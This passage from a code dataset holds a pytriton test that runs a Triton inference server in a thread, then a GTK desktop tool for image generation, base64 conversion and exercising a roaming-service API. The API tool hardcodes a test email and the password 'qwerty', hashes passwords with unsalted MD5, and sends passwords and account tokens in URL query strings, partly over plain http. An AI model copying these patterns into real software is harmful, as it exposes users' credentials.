ADD_SUB_PYTHON_MODEL\nfrom tests.utils import find_free_port\n\nLOGGER = logging.getLogger((__package__ or \"main\").split(\".\")[-1])\n\nsignal_handled = False\ncond = threading.Condition()\n\n\nclass MyTritonThread(threading.Thread):\n def __init__(self, args):\n super().__init__(daemon=True)\n self.triton_config = None\n self.exception_traceback = None\n self.triton = None\n self.args = args\n\n def run(self) -> None:\n try:\n assert self.args is not None\n assert self.args.grpc_port is not None\n assert self.args.http_port is not None\n\n self.triton_config = TritonConfig(\n grpc_port=self.args.grpc_port, http_port=self.args.http_port, metrics_port=find_free_port()\n )\n LOGGER.debug(f\"Using {self.triton_config}\")\n self.triton = Triton(config=self.triton_config)\n model_spec = ADD_SUB_PYTHON_MODEL\n LOGGER.debug(f\"Using {model_spec}\")\n self.triton.bind(\n model_name=model_spec.name,\n infer_func=model_spec.create_infer_fn(),\n inputs=model_spec.inputs,\n outputs=model_spec.outputs,\n config=model_spec.model_config,\n )\n self.triton.serve()\n\n except Exception:\n self.exception_traceback = traceback.format_exc()\n with cond:\n cond.notify()\n\n\ndef signal_handler(_signal_num: Any, _) -> None:\n with cond:\n global signal_handled\n signal_handled = True\n cond.notify()\n\n\ndef main():\n from tests.utils import DEFAULT_LOG_FORMAT\n\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\n \"--init-timeout-s\", required=False, default=300, type=float, help=\"Timeout for server and models initialization\"\n )\n parser.add_argument(\"--batch-size\", type=int, default=32, help=\"Size of single inference batch\")\n parser.add_argument(\"--seed\", type=int, help=\"PRNG seed\", required=False)\n parser.add_argument(\"--verbose\", \"-v\", action=\"store_true\", help=\"Timeout for test\")\n parser.add_argument(\"--grpc-port\", type=int, help=\"Grpc triton port\")\n parser.add_argument(\"--http-port\", type=int, help=\"Http triton port\")\n args = parser.parse_args()\n\n log_level = logging.DEBUG if args.verbose else logging.INFO\n logging.basicConfig(level=log_level, format=DEFAULT_LOG_FORMAT)\n logging.captureWarnings(True)\n LOGGER.debug(f\"CLI args: {args}\")\n\n random.seed(args.seed)\n\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n th = MyTritonThread(args)\n th.start()\n\n with cond:\n cond.wait()\n\n assert signal_handled\n assert th.triton is not None\n th.triton.stop()\n LOGGER.info(\"Signal handled and triton server properly stopped\")\n\n assert th.exception_traceback is None, f\"Raised {th.exception_traceback}\"\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "triton-inference-server/pytriton", "sub_path": "tests/functional/L0_run_in_thread/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 3194, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 570, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "threading.Condition", "line_number": 16, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pytriton.triton.TritonConfig", "line_number": 33, "usage_type": "call"}, {"api_name": "tests.utils.find_free_port", "line_number": 34, "usage_type": "call"}, {"api_name": "pytriton.triton.Triton", "line_number": 37, "usage_type": "call"}, {"api_name": "tests.functional.common.models.ADD_SUB_PYTHON_MODEL", 
"line_number": 38, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 50, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 55, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 65, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 76, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 76, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 77, "usage_type": "call"}, {"api_name": "tests.utils.DEFAULT_LOG_FORMAT", "line_number": 77, "usage_type": "name"}, {"api_name": "logging.captureWarnings", "line_number": 78, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 81, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 83, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "signal.signal", "line_number": 84, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 84, "usage_type": "attribute"}]} +{"seq_id": "9333331155", "text": "#!/usr/bin/env python3\nimport base64\nimport urllib\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport json\nimport hashlib\nimport requests\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\nfrom PIL import Image, ImageFont, ImageDraw\n\nicons = [\"edit-cut\", \"edit-paste\", \"edit-copy\"]\n# dastools is a multi-purpose tool written in Python\n# Simply launch dastools on the command line as follows :\n# ./dastools.py\n# Enter the dimensions you want the image to be and the enter the text you want on the image and click generate.\n# An image with the filename image_generated_output.png will be generated.\n# More documentation can be found here :\n# http://confluence.knowroaming.com/display/AA/Android+%3A+Vsim+Apps+%3A+Offline+Activation+%3A+SecureVault%2C+Cromulent%2C+Kwijybo%2C+Garfield#Android:VsimApps:OfflineActivation:SecureVault,Cromulent,Kwijybo,Garfield-GarfieldGUI\n# http://www.pygtk.org/pygtk2tutorial/sec-PackingUsingTables.html\n# http://python-gtk-3-tutorial.readthedocs.io/en/latest/index.html\nclass DastoolsWindow(Gtk.Window):\n\t\"\"\"docstring for DastoolsWindow\"\"\"\n\tdef __init__(self):\n\t\tGtk.Window.__init__(self, title=\"DasTools is a GUI which provides common useful functionality from multiple tools\")\n\t\tself.set_border_width(20)\n\t\tself.set_default_size(800, 300)\n\n\t\thb = Gtk.HeaderBar()\n\t\thb.set_show_close_button(True)\n\t\thb.props.title = \"DasTools\"\n\t\tself.set_titlebar(hb)\n\n\t\tself.headerbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n\t\tGtk.StyleContext.add_class(self.headerbox.get_style_context(), \"linked\")\n\n\t\t# buttonleft = Gtk.Button()\n\t\t# buttonleft.add(Gtk.Arrow(Gtk.ArrowType.LEFT, Gtk.ShadowType.NONE))\n\t\t# self.headerbox.add(buttonleft)\n\n\t\t# buttonright = Gtk.Button()\n\t\t# buttonright.add(Gtk.Arrow(Gtk.ArrowType.RIGHT, Gtk.ShadowType.NONE))\n\t\t# self.headerbox.add(buttonright)\n\n\t\thb.pack_start(self.headerbox)\n\n\t\t# self.hbox = Gtk.Box(spacing=7)\n\t\t# start stack\n\n\t\tself.vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n\t\tself.add(self.vbox)\n\n\t\tself.stack = Gtk.Stack()\n\t\tself.stack.set_transition_type(Gtk.StackTransitionType.SLIDE_LEFT_RIGHT)\n\t\tself.stack.set_transition_duration(1000)\n\n\n\n\n\t\tself.stack_switcher = Gtk.StackSwitcher()\n\t\tself.stack_switcher.set_stack(self.stack)\n\t\tself.vbox.pack_start(self.stack_switcher, True, True, 
0)\n\t\tself.vbox.pack_start(self.stack, True, True, 0)\n\n\n\t\t# JuliusGenerator\n\t\tself.entry_width = Gtk.Entry()\n\t\tself.entry_width.set_placeholder_text(\"320\")\n\t\tself.entry_height = Gtk.Entry()\n\t\tself.entry_height.set_placeholder_text(\"480\")\n\t\tself.entry_displaytext = Gtk.Entry()\n\t\tself.entry_displaytext.set_placeholder_text(\"Lorem Ipsum\")\n\n\n\n\t\tself.button_generate = Gtk.Button(label=\"Generate image\")\n\t\tself.button_generate.connect(\"clicked\", self.on_button_generate_clicked)\n\n\t\tself.button_save = Gtk.Button(label=\"Save\")\n\t\tself.button_save.connect(\"clicked\", self.on_button_save_clicked)\n\n\t\tself.label_width = Gtk.Label(label=\"Width\", angle=0, halign=Gtk.Align.START)\n\t\tself.label_height = Gtk.Label(label=\"Height\", angle=0, halign=Gtk.Align.START)\n\t\tself.label_displaytext = Gtk.Label(label=\"Display Text\", angle=0, halign=Gtk.Align.START)\n\n\n\n\t\tjulius_file_name = \"julius_placeholder.jpg\"\n\t\tself.frame_placeholder = Gtk.Frame(label=\"Preview\")\n\t\tself.frame_placeholder.set_label_align(0.5, 0.5)\n\t\tself.frame_placeholder.set_shadow_type(Gtk.ShadowType.IN)\n\t\tself.image_placeholder = Gtk.Image.new_from_file(julius_file_name)\n\t\tself.frame_placeholder.add(self.image_placeholder)\n\n\n\n\n\t\ttable = Gtk.Table(2,5)\n\t\ttable.attach(self.label_width, 0, 1, 0, 1)\n\t\ttable.attach(self.entry_width, 1, 2, 0, 1)\n\t\ttable.attach(self.label_height, 0, 1, 1, 2)\n\t\ttable.attach(self.entry_height, 1, 2, 1, 2)\n\t\ttable.attach(self.label_displaytext, 0, 1, 2, 3)\n\t\ttable.attach(self.entry_displaytext, 1, 2, 2, 3)\n\t\ttable.attach(self.button_generate, 1, 2, 3, 4)\n\t\ttable.attach(self.button_save, 0, 1, 3, 4)\n\t\ttable.attach(self.frame_placeholder, 0, 2, 4, 5)\n\n\n\t\t# AugustusBase64Tools start\n\t\ttable_base64 = Gtk.Table(2, 5)\n\n\t\tself.label_base64_plaintext = Gtk.Label(label=\"Plaintext\", angle=0, halign=Gtk.Align.START)\n\t\ttable_base64.attach(self.label_base64_plaintext, 0, 1, 0, 1)\n\n\t\tself.entry_base64_plaintext = Gtk.Entry()\n\t\tself.entry_base64_plaintext.set_placeholder_text(\"Plaintext\")\n\t\ttable_base64.attach(self.entry_base64_plaintext, 1, 2, 0, 1)\n\n\t\tself.label_base64_ciphertext = Gtk.Label(label=\"Ciphertext\", angle=0, halign=Gtk.Align.START)\n\t\ttable_base64.attach(self.label_base64_ciphertext, 0, 1, 1, 2)\n\n\t\tself.entry_base64_ciphertext = Gtk.Entry()\n\t\tself.entry_base64_ciphertext.set_placeholder_text(\"Ciphertext\")\n\t\ttable_base64.attach(self.entry_base64_ciphertext, 1, 2, 1, 2)\n\n\t\tself.frame_base64_placeholder = Gtk.Frame(label=\"Preview\")\n\t\tself.frame_base64_placeholder.set_label_align(0.5, 0.5)\n\t\tself.frame_base64_placeholder.set_shadow_type(Gtk.ShadowType.IN)\n\t\tself.image_base64_placeholder = Gtk.Image.new_from_file('augustus_placeholder.png')\n\t\tself.frame_base64_placeholder.add(self.image_base64_placeholder)\n\n\n\t\ttable_base64.attach(self.frame_base64_placeholder, 0, 2, 4, 5)\n\n\t\tself.button_to_base64 = Gtk.Button(label=\"Convert to base64\")\n\t\tself.button_to_base64.connect(\"clicked\", self.on_button_to_base64_clicked)\n\n\t\tself.button_from_base64 = Gtk.Button(label=\"Convert from base64\")\n\t\tself.button_from_base64.connect(\"clicked\", self.on_button_from_base64_clicked)\n\n\t\ttable_base64.attach(self.button_from_base64, 1, 2, 3, 4)\n\t\ttable_base64.attach(self.button_to_base64, 0, 1, 3, 4)\n\n\t\t# AugustusBase64Tools end\n\n\n\t\t# AureliusTools start\n\n\t\ttable_aurelius = Gtk.Table(4, 
21)\n\n\t\t##############################################################\n\t\t# Global Constants\n\t\t##############################################################\n\t\tself.ver = \"3\"\n\t\tself.vendorId = \"168118\"\n\t\tself.chipsetVendorId = \"2\"\n\t\tself.oemBrandingSelectorId = \"106\"\n\t\tself.appVersion = \"2.30.9\"\n\t\tself.phoneOS = \"Android%207.1.2\"\n\t\tself.phoneModel = \"BlackBerry%20BBD100-1\"\n\t\t##############################################################\n\t\t# BaseURL\n\t\t##############################################################\n\t\t# Label1\n\t\tself.label_aurelius_base_url = Gtk.Label(label=\"Select Environment : \", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_base_url, 0, 2, 0, 1)\n\n\t\t# Entry1\n\t\t# self.entry_aurelius_base_url = Gtk.Entry()\n\t\t# self.entry_aurelius_base_url.set_text(\"http://10.27.74.20:9000/API_Handler_release_live/?\")\n\t\t# table_aurelius.attach(self.entry_aurelius_base_url, 0, 2, 1, 2)\n\n\t\tenvironments = [\"https://app.knowroaming.com/API_Handler_release_live/?\", \"http://10.27.74.20:9000/API_Handler_release_live/?\"]\n\t\tself.environments_combo = Gtk.ComboBoxText()\n\t\t# self.environments_combo.set_entry_text_column(0)\n\t\tself.environments_combo.connect(\"changed\", self.on_environments_combo_changed)\n\t\tfor env in environments:\n\t\t\tself.environments_combo.append_text(env)\n\t\ttable_aurelius.attach(self.environments_combo, 0, 2, 1, 2)\n\n\n\t\tself.label_aurelius_base_url_confirm = Gtk.Label(label=\"Click to login : \", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_base_url_confirm, 2, 4, 0, 1)\n\n\t\t# Button12\n\t\tself.button_aurelius_do_login = Gtk.Button(label=\"Login\")\n\t\ttable_aurelius.attach(self.button_aurelius_do_login, 2, 4, 1, 2)\n\t\tself.button_aurelius_do_login.connect(\"clicked\", self.on_button_aurelius_do_login_clicked)\n\n\t\t##############################################################\n\t\t# Commands\n\t\t##############################################################\n\n\n\t\t# Label2\n\t\tself.label_aurelius_command = Gtk.Label(label=\"Command\", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_command, 0, 2, 2, 3)\n\n\t\tcommands = [\"checkAppVersion\", \\\n\t\t\t\t\t\"getBuyablePackages\", \\\n\t\t\t\t\t\"getAlcatelCountries_n\", \\\n\t\t\t\t\t\"getHistory_TODO\", \\\n\t\t\t\t\t\"getPrivateNews\", \\\n\t\t\t\t\t\"getPublicNews\", \\\n\t\t\t\t\t\"updatePushNotificationDeviceToken\", \\\n\t\t\t\t\t\"getCustomerInformation\"]\n\t\tself.commands_combo = Gtk.ComboBoxText()\n\t\t# self.environments_combo.set_entry_text_column(0)\n\t\tself.commands_combo.set_active(0)\n\t\tself.commands_combo.connect(\"changed\", self.on_commands_combo_changed)\n\t\tfor command in commands:\n\t\t\tself.commands_combo.append_text(command)\n\n\t\t# Entry2\n\t\t# self.entry_aurelius_two = Gtk.Entry()\n\t\t# self.entry_aurelius_two.set_placeholder_text(\"Command\")\n\t\ttable_aurelius.attach(self.commands_combo, 0, 2, 3, 4)\n\n\t\t# LabelRight\n\t\tself.label_aurelius_save_command_confirm = Gtk.Label(label=\"Click to execute command : \", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_save_command_confirm, 2, 4, 2, 3)\n\n\t\t# Button22\n\t\tself.button_aurelius_execute_command = Gtk.Button(label=\"Execute command\")\n\t\ttable_aurelius.attach(self.button_aurelius_execute_command, 2, 4, 3, 4)\n\t\tself.button_aurelius_execute_command.connect(\"clicked\", 
self.on_button_aurelius_execute_command_clicked)\n\n\t\t##############################################################\n\t\t# Email\n\t\t##############################################################\n\t\t# Label3\n\t\tself.label_aurelius_three = Gtk.Label(label=\"email\", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_three, 0, 2, 4, 5)\n\n\t\t# Entry3\n\t\tself.entry_aurelius_current_email = Gtk.Entry()\n\t\tself.entry_aurelius_current_email.set_text(\"blackberry01@knowroaming.com\")\n\t\ttable_aurelius.attach(self.entry_aurelius_current_email, 0, 2, 5, 6)\n\n\t\t# Button31\n\t\tself.button_aurelius_save_email = Gtk.Button(label=\"Save Email\")\n\t\ttable_aurelius.attach(self.button_aurelius_save_email, 2, 4, 4, 5)\n\t\tself.button_aurelius_save_email.connect(\"clicked\", self.on_button_aurelius_save_email_clicked)\n\n\t\t# Button32\n\t\tself.button_aurelius_saved_email = Gtk.Button(label=\"Saved Email : \")\n\t\ttable_aurelius.attach(self.button_aurelius_saved_email, 2, 4, 5, 6)\n\n\t\t##############################################################\n\t\t# Password\n\t\t##############################################################\n\t\t# Label4\n\t\tself.label_aurelius_four = Gtk.Label(label=\"password\", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_four, 0, 2, 6, 7)\n\n\t\t# Entry4\n\t\tself.entry_aurelius_four = Gtk.Entry()\n\t\tself.entry_aurelius_four.set_text(\"qwerty\")\n\t\ttable_aurelius.attach(self.entry_aurelius_four, 0, 2, 7, 8)\n\n\t\t# Button41\n\t\tself.button_aurelius_save_password = Gtk.Button(label=\"Save Password\")\n\t\ttable_aurelius.attach(self.button_aurelius_save_password, 2, 4, 6, 7)\n\n\t\t# Button41\n\t\tself.button_aurelius_saved_password = Gtk.Button(label=\"Saved Password : \")\n\t\ttable_aurelius.attach(self.button_aurelius_saved_password, 2, 4, 7, 8)\n\n\t\t##############################################################\n\t\t# Vendor\n\t\t##############################################################\n\n\t\tself.label_aurelius_vendor_select = Gtk.Label(label=\"Select Vendor : \", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_vendor_select, 0, 2, 8, 9)\n\n\t\tvendor_store = Gtk.ListStore(int, str)\n\t\tvendor_store.append([168011, \"ZTE\"])\n\t\tvendor_store.append([2, \"POP\"])\n\t\tvendor_store.append([168121, \"COOLPAD\"])\n\t\tvendor_store.append([168118, \"BLACKBERRY\"])\n\t\tself.vendor_combo = Gtk.ComboBox.new_with_model_and_entry(vendor_store)\n\t\tself.vendor_combo.connect(\"changed\", self.on_vendor_combo_changed)\n\t\tself.vendor_combo.set_entry_text_column(1)\n\t\tself.vendor_combo.set_active(0)\n\t\ttable_aurelius.attach(self.vendor_combo, 0, 2, 9, 10)\n\n\t\t##############################################################\n\t\t# Output\n\t\t##############################################################\n\t\t# AureliusPreview\n\t\t# self.frame_aurelius_placeholder = Gtk.Frame(label=\"Preview\")\n\t\t# self.frame_aurelius_placeholder.set_label_align(0.5, 0.5)\n\t\t# self.frame_aurelius_placeholder.set_shadow_type(Gtk.ShadowType.IN)\n\t\t# self.image_aurelius_placeholder = Gtk.Image.new_from_file('aurelius_placeholder.jpg')\n\t\t# self.frame_aurelius_placeholder.add(self.image_aurelius_placeholder)\n\t\t# table_aurelius.attach(self.frame_aurelius_placeholder, 0, 2, 11, 12)\n\n\t\t# aureliusTextViewOutput\n\t\tself.frame_aurelius_output_placeholder = Gtk.Frame(label=\"Output\")\n\t\tself.frame_aurelius_output_placeholder.set_label_align(0.5, 
0.5)\n\t\tself.frame_aurelius_output_placeholder.set_shadow_type(Gtk.ShadowType.IN)\n\t\tself.textbuffer_output = Gtk.TextBuffer()\n\t\tself.textview_output = Gtk.TextView(buffer=self.textbuffer_output)\n\t\tself.textview_output.set_wrap_mode(Gtk.WrapMode.WORD)\n\n\t\tself.frame_aurelius_output_placeholder.add(self.textview_output)\n\t\ttable_aurelius.attach(self.frame_aurelius_output_placeholder, 0, 4, 16, 21)\n\n\t\t# JacksTools end\n\n\n\t\t# Continue stack\n\t\tself.resizer_button = Gtk.Button(label=\"AugustusBase64Tools\")\n\t\tself.stack.add_titled(table_base64, \"base64tools\", \"AugustusTools : Base64\")\n\t\tself.stack.add_titled(table, \"generator\", \"JuliusTools : Generator\")\n\t\tself.stack.add_titled(table_aurelius, \"aureliustools\", \"AureliusTools : Network Gym : API Exerciser\")\n\t##############################################################\n\tdef on_button_generate_clicked(self, widget):\n\t\twidth_value = self.entry_width.get_text()\n\t\twidth_value_int = int(width_value)\n\t\tprint('Width %s' % width_value )\n\t\theight_value = self.entry_height.get_text()\n\t\theight_value_int = int(height_value)\n\t\tprint('Height %s' % height_value)\n\t\tdisplaytext_value = self.entry_displaytext.get_text()\n\t\tprint(displaytext_value)\n\t\tfontname = 'FreeMono.ttf'\n\t\tfontsize = 20\n\n\t\tcolor_text = 'black'\n\t\tcolor_outline = 'red'\n\t\tcolor_background = 'transparent'\n\n\t\t# self.image_generated = Image.new('RGBA', (width_value_int, height_value_int), color_background)\n\t\tself.image_generated = Image.new('RGBA', (width_value_int, height_value_int))\n\t\tself.image_draw_generated = ImageDraw.Draw(self.image_generated)\n\t\tfont = ImageFont.truetype(fontname, fontsize)\n\t\tself.image_draw_generated.text((2, height_value_int/2), displaytext_value, fill=color_text, font=font)\n\t\tself.image_generated.save('image_generated_output.png')\n\n\t##############################################################\n\tdef on_button_save_clicked(self, widget):\n\t\tprint(\"Saving...\")\n\n\t##############################################################\n\tdef on_button_to_base64_clicked(self, widget):\n\t\tprint(\"To base64...\")\n\t\tplaintext_value = self.entry_base64_plaintext.get_text()\n\t\tprint(\"Plaintext:\")\n\t\tprint(plaintext_value)\n\t\tciphertext_value = base64.b64encode(bytes(plaintext_value, 'utf-8')).decode('utf-8')  # decode to str, since Gtk.Entry.set_text rejects bytes\n\t\tself.entry_base64_ciphertext.set_text(ciphertext_value)\n\t\tprint(ciphertext_value)\n\n\t##############################################################\n\tdef on_button_from_base64_clicked(self, widget):\n\t\tprint(\"From base64...\")\n\n\t##############################################################\n\tdef on_button_aurelius_save_base_url_clicked(self, widget):\n\t\t# base_url_value = self.entry_aurelius_base_url.get_text()\n\t\t# self.label_aurelius_base_url.set_text(\"BaseURL : \" + base_url_value)\n\t\t# self.textbuffer_output.set_text(\"Saved : \" + base_url_value)\n\t\tprint(\"on_button_aurelius_save_base_url_clicked\")\n\n\t##############################################################\n\tdef on_environments_combo_changed(self, combo):\n\t\tenvironments_entry_txt = combo.get_active_text()\n\t\tif environments_entry_txt != None:\n\t\t\tself.base_url_value = environments_entry_txt\n\t\t\tself.textbuffer_output.set_text(\"Changed... 
%s \" % environments_entry_txt)\n\n\t##############################################################\n\tdef on_commands_combo_changed(self, combo):\n\t\tcommands_entry_txt = combo.get_active_text()\n\t\tif commands_entry_txt != None:\n\t\t\tself.selected_command = commands_entry_txt\n\t\t\tself.button_aurelius_execute_command.set_label(\"Execute command : %s \" % commands_entry_txt)\n\t\t\tself.textbuffer_output.set_text(\"You are logged in as the following user : account_number : %s\" % self.account_number)\n\n\t##############################################################\n\tdef on_button_aurelius_do_login_clicked(self, widget):\n\t\t\tself.textbuffer_output.set_text(\"Login...\")\n\t\t\tlogin_value = self.entry_aurelius_current_email.get_text()\n\t\t\tself.selected_command = \"verifyLogin_n\"\n\t\t\t# password_value = self.entry_aurelius_four.get_text()\n\t\t\tself.hashed_password = hashlib.md5(self.entry_aurelius_four.get_text().encode('utf-8')).hexdigest()\n\t\t\tpassword_value = self.hashed_password\n\t\t\tself.current_request = self.base_url_value \\\n\t\t\t+ \"login=\" + login_value \\\n\t\t\t+ \"&password=\" + password_value \\\n\t\t\t+ \"&cmd=\" + self.selected_command \\\n\t\t\t+ \"&startTime=1499956971244&startingPosition=-2&intervalInDays=-1&phoneOS=iOS&phoneModel=iPad\";\n\t\t\tprint(\"Request \\n\" + self.current_request)\n\t\t\tresponse = urllib.request.urlopen(self.current_request)\n\t\t\tcharset_encoding = response.info().get_content_charset()\n\t\t\tcontent = response.read()\n\t\t\tjson_data = json.loads(content.decode(charset_encoding))\n\t\t\t# soup = BeautifulSoup(content.decode(charset_encoding))\n\t\t\tself.account_number = json_data['account_number']\n\t\t\tself.email = json_data['email']\n\t\t\tself.account_token = json_data['account_token']\n\n\t\t\t# self.textbuffer_output.set_text(\"Response ...account_number : %s\" % soup)\n\t\t\tself.textbuffer_output.set_text(\"You are logged in as the following user : account_number : %(1)s : email : %(2)s\" % {\"1\" : self.account_number, \"2\" : self.email})\n\t##############################################################\n\tdef on_button_aurelius_execute_command_clicked(self, widget):\n\t\t\tself.current_request = self.base_url_value + \"cmd=\" \\\n\t\t\t+ self.selected_command \\\n\t\t\t+ \"&account_number=\" \\\n\t\t\t+ self.account_number \\\n\t\t\t+ \"&account_token=\" \\\n\t\t\t+ self.account_token \\\n\t\t\t+ \"&ver=\" \\\n\t\t\t+ self.ver \\\n\t\t\t+ \"&vendorId=\" \\\n\t\t\t+ self.vendorId \\\n\t\t\t+ \"&chipsetVendorId=\" \\\n\t\t\t+ self.chipsetVendorId \\\n\t\t\t+ \"&oemBrandingSelectorId=\" \\\n\t\t\t+ self.oemBrandingSelectorId \\\n\t\t\t+ \"&appVersion=\" \\\n\t\t\t+ self.appVersion \\\n\t\t\t+ \"&phoneOS=\" \\\n\t\t\t+ self.phoneOS \\\n\t\t\t+ \"&phoneModel=\" \\\n\t\t\t+ self.phoneModel\n\t\t\tprint(\"Request \\n\" + self.current_request)\n\t\t\tresponse = urllib.request.urlopen(self.current_request)\n\t\t\tcharset_encoding = response.info().get_content_charset()\n\t\t\tcontent = response.read()\n\t\t\tjson_data = json.loads(content.decode(charset_encoding))\n\t\t\t# soup = BeautifulSoup(content.decode(charset_encoding))\n\t\t\tself.status = json_data['status']\n\t\t\tself.textbuffer_output.set_text(\"status : %s\" % self.status)\n\t\t\t# self.textbuffer_output.set_text(\"status : %s\" % soup)\n\t\t\t# self.textbuffer_output.set_text(\"status : %s\" % json_data)\n\n\t##############################################################\n\tdef on_button_aurelius_save_email_clicked(self, 
widget):\n\t\tself.button_aurelius_saved_email.set_label(self.entry_aurelius_current_email.get_text())\n\t\tprint(\"Saving \" + self.entry_aurelius_current_email.get_text())\n\t##############################################################\n\tdef on_vendor_combo_changed(self, combo):\n\t\ttree_iter = combo.get_active_iter()\n\t\tif tree_iter != None:\n\t\t\tmodel = combo.get_model()\n\t\t\trow_id, name = model[tree_iter][:2]\n\t\t\tprint(\"Selected: ID=%d, name=%s\" % (row_id, name))\n\t\t\tself.vendorId = str(row_id)\n\t##############################################################\nwin = DastoolsWindow()\nwin.connect(\"delete-event\", Gtk.main_quit)\nwin.show_all()\nGtk.main()\n", "repo_name": "arunabhdas/juliustools", "sub_path": "dastools/dastools.py", "file_name": "dastools.py", "file_ext": "py", "file_size_in_byte": 19093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "gi.require_version", "line_number": 10, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 24, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 24, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 27, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 27, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 27, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HeaderBar", "line_number": 31, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 31, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 36, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 36, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Orientation", "line_number": 36, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.StyleContext.add_class", "line_number": 37, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.StyleContext", "line_number": 37, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 37, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 52, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 52, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Orientation", "line_number": 52, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Stack", "line_number": 55, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 55, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.StackTransitionType", "line_number": 56, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 56, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.StackSwitcher", "line_number": 62, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 62, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 69, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 69, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 71, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 71, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 73, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 73, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 78, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 78, "usage_type": "name"}, {"api_name": 
"gi.repository.Gtk.Button", "line_number": 81, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 81, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 84, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 84, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 84, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 85, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 85, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 85, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 86, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 86, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 86, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Frame", "line_number": 91, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 91, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ShadowType", "line_number": 93, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 93, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Image.new_from_file", "line_number": 94, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Image", "line_number": 94, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 94, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Table", "line_number": 100, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 100, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Table", "line_number": 113, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 113, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 115, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 115, "usage_type": "name"}, 